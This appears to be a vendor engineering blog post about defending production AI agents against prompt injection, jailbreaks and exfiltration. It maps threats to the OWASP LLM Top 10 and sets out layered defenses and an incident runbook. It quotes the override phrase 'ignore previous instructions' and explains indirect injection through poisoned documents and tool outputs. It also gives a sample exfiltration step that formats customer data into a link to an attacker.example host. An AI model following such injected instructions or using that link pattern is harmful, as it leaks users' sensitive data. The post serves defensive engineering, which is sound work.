A VentureStdio Company
SecurityFor Security & complianceFor VP Engineering

Agent guardrails: prompt injection, jailbreaks, and exfiltration in production

What stops adversarial inputs in production agentic systems beyond "better prompts" - layered defenses, red-team evidence, and gateway-level controls that survive real adversaries.

TTechimax EngineeringForward-deployed engineering team14 min readUpdated May 10, 2026

The attack surface in 2026

Prompt injection has matured from a research curiosity to a production threat. Adversaries don't write "ignore previous instructions" anymore - they poison retrievable corpora, hide instructions in tool outputs, and chain low-trust inputs into high-trust actions. Direct prompt injection is the easy case; indirect injection is what kills agents.

Anthropic, OpenAI, and academic groups all publish red-team data showing single-layer defenses (system prompt + best-of-class model) breach rates in the 35–60% range against capable adversaries [1]. Layered defenses bring this to single digits.

Mapping to the OWASP LLM Top 10

OWASP's Top 10 for LLM applications [3] formalizes the threat model that production teams now ship against. Every finding from a serious red-team exercise maps cleanly into one of these categories - which is exactly the point. The Top 10 is the shared vocabulary risk teams, security engineers, and AI engineers use to scope defenses.

Practical implication: catalog your eval suite by OWASP category. The model risk team gets a coverage map; the engineering team gets a prioritized backlog. We see most production agents covering 6–7 of the Top 10 well and 3–4 weakly - the gap is usually LLM06 (sensitive information disclosure) and LLM08 (excessive agency).

CategoryRiskPrimary defense layer
LLM01Prompt injection (direct + indirect)Application + eval (red-team)
LLM02Insecure output handlingApplication (output schemas)
LLM03Training data poisoningProvider (model selection)
LLM04Model denial of serviceGateway (rate + cost caps)
LLM05Supply chain vulnerabilitiesProvider + sub-processor list
LLM06Sensitive info disclosureGateway (PII / exfil filters)
LLM07Insecure plugin designApplication (tool schemas + idempotency)
LLM08Excessive agencyApplication (action allow-list + HITL)
LLM09OverrelianceUX (citations, refusals, undo)
LLM10Model theftInfrastructure (egress controls)
OWASP LLM Top 10 - defense layer that primarily addresses each
Chart · % breached
Successful indirect prompt-injection attempts by defense stack
View data table· Source: Anthropic + academic red-team data 2024–2025; Techimax engagement red-team
Series% breached
No defenses64
+ System prompt only41
+ Output schema validation24
+ Gateway PII/exfil filters12
+ Eval-suite red-team cases4
The four-layer defense stack
  • Provider layer

    Pick a model with strong refusal calibration. Anthropic and OpenAI lead on this benchmark in 2026; open-weight models lag without fine-tuning.

  • Application layer

    Output schemas (Zod or equivalent) reject tool-call attempts that fall outside the contract. Strict validators are guardrails the prompt can't bypass.

  • Gateway layer

    PII redaction, exfiltration filters (no URLs, no embedded HTML, no full account numbers), prompt-allow-list patterns. Gateway sees every request; prompt-level instructions don't.

  • Eval layer

    Every red-team finding becomes an eval case. The eval suite is the regression test for prompt injection. Pass-rate on the red-team suite gates production deploys.

Indirect injection: the harder case

Indirect injection happens when an agent reads from a corpus or tool output that an attacker can influence - a customer-facing knowledge base, a third-party CRM record, a webpage the agent retrieves. The attacker's payload is never typed by them; it's seeded into the corpus and waits.

Defenses that work: separate trusted (system, developer-controlled) from untrusted (retrieved, tool-output) content explicitly in the prompt structure; cap untrusted-content influence on tool calls; never let untrusted content propose tools or change tool arguments. Anthropic's structured prompting and OpenAI's tool-call discipline both support this pattern.

Tool-call validation rejects injected argumentsts
// The model proposes a refund_amount of $9000 because the
// retrieved doc said \"customer is owed all charges.\" The schema
// enforces the policy regardless.
const result = await refundTool.callWithValidation({
  proposed: agentDecision,
  // The schema (defined elsewhere) caps refund_amount and requires
  // a reason from a fixed enum. Both fail closed on injection.
});

if (!result.allowed) {
  // Log the denied call to the audit + eval system. Pages on-call
  // if denied calls spike (signal of injection campaign).
  audit.logDenied(result);
  return await escalateToHuman(originalRequest);
}

Exfiltration: the quiet failure mode

Exfiltration attacks coerce the agent to leak sensitive data - typically by chaining retrieval ("summarize this customer's full ticket history") with output ("format as a markdown link to https://attacker.example/?data=..."). Without gateway-level URL filters, this works.

Counter: gateway-level rules that strip outbound URLs from non-trusted-output paths; mark every retrieved field with a sensitivity tag; refuse to format sensitive fields into URL parameters. None of these defenses live in the prompt.

Chart
Real-world prompt-injection campaign vectors observed in 2024–2026 (n = 47 customer incidents)
View data table· Source: Techimax incident response logs; cross-referenced with public OWASP advisories
SeriesValue
Indirect via retrieved doc38
Indirect via tool output21
Direct user input17
Multimodal (image text)11
Email / inbound message8
Voice transcription5

Red-team cadence: how often is enough?

We default to quarterly structured red-team exercises plus continuous automated red-teaming. Each session generates new eval cases that compound into the regression suite - the eval suite gets harder over time, automatically. Skipping red-teaming for a quarter is the leading indicator of a future incident.

Structured: 90-minute session with a security engineer + a senior AI engineer. Document everything that worked. Add cases to the eval suite. Continuous: an automated harness that fuzzes the agent with known injection patterns nightly and surfaces successful breaches into the eval review queue.

Incident response: what to do when (not if) injection succeeds

Even with layered defenses, breaches happen. The mean time to detect (MTTD) for a prompt-injection campaign in our incident data: 6 hours when alarms are wired correctly; 11 days when they aren't. The difference is the alarm on tool-call denial-rate spikes - adversarial campaigns trigger the schema-validation layer at unusual rates before they succeed at exfiltration.

Playbook: kill-switch the affected agent surface; quarantine the trace; harvest cases into the eval suite; recalibrate defenses; document the incident with the security team. Run a drill quarterly so the response is muscle memory, not improvisation.

PhaseActionOwnerSLA
DetectAlarm on denial-rate spike or PII-filter triggerOn-call engineerContinuous
ContainEngage agent kill-switch; route to fallbackOn-call + security< 15 min
QuarantineSnapshot traces; preserve context for forensicsSecurity engineer< 1h
EradicatePatch defenses; add eval cases; deploy fixEngineering pod< 24h
RecoverLift kill-switch; canary 10% → 100% with eval gatingEngineering + product24–72h
Post-mortemBlameless review; document; share with risk teamEngineering lead< 5 business days
Prompt-injection incident response runbook

"Asking nicely" doesn't survive contact with adversaries. The defenses that work validate behavior, not promises. Out-of-band, layered, evidence-based - or it isn't a defense.

References

  1. [1]Indirect prompt injection benchmarks - Anthropic Trust & Safety (2024)
  2. [2]Red-teaming generative AI - OpenAI safety (2024)
  3. [3]OWASP Top 10 for LLM applications - OWASP (2024)
  4. [4]Cost of a Data Breach Report 2024 - IBM Security (2024)
  5. [5]MITRE ATLAS - Adversarial Threat Landscape for AI Systems - MITRE (2024)
  6. [6]AI Risk Management Framework Generative AI Profile - NIST (2024)

Frequently asked questions

Are guardrail libraries (Guardrails AI, NeMo Guardrails) sufficient?

Useful as one layer; not sufficient alone. Combine with the application-level (schemas) and eval-level (red-team cases) layers for production. We use them when they fit; we don't depend on them as the only defense.

How often should we red-team?

Quarterly minimum; on every major prompt or model change. Each red-team session generates new eval cases that compound. Drift in red-team pass-rate signals model or corpus changes that require attention.

What about prompt-injection-in-images / multimodal attacks?

Real and increasingly common in 2026. Apply the same four-layer pattern: model-level (capable refusal on text-in-image), gateway (OCR scrub for known injection patterns), schema-level enforcement on tool calls regardless of modality, and eval cases that include multimodal payloads.

Can we publish our system prompt?

Generally fine. Adversaries reverse-engineer it anyway. The defenses that matter are out-of-band; the system prompt is not the security boundary.

How do we measure red-team coverage?

Two metrics: case count by OWASP LLM category (target: 10+ cases per category at production maturity), and pass-rate on the red-team suite (target: ≥ 96% at production maturity). The pass-rate must hold under model swaps and prompt changes - that's why eval-gated CI is non-negotiable.

Should the red-team be internal or external?

Both. Internal red-team understands your domain and finds business-logic-specific injections. External red-team brings adversarial creativity and benchmark calibration. Run both at least once a year; combine findings into the eval suite.

What's the cost of layered defenses?

Single-digit milliseconds added latency for gateway filtering and schema validation. Roughly 8–12% engineering effort during initial build for proper layering. The cost of the alternative - a public exfiltration incident - is orders of magnitude higher [4].

How does MCP (Model Context Protocol) affect the threat model?

MCP standardizes tool discovery and invocation; same prompt-injection threat model applies. Schema validation and tool-call validators sit on the MCP server side and apply identically. We treat MCP-based agents as no more or less risky than custom agents - the discipline is what matters.

Talk to engineering

Ready to ship the patterns from this post?

Tell us where you are. A senior forward-deployed engineer replies within 24 hours with a written plan tailored to your stack - never an SDR.

  • Practical engineering review of your current setup
  • Eval discipline + observability + cost controls
  • Free 60-min working session, no sales pitch

Senior reply within 24h

Drop your details and we'll match you with an engineer who's shipped in your industry.

By submitting, you agree to our privacy policy. We'll never share your information.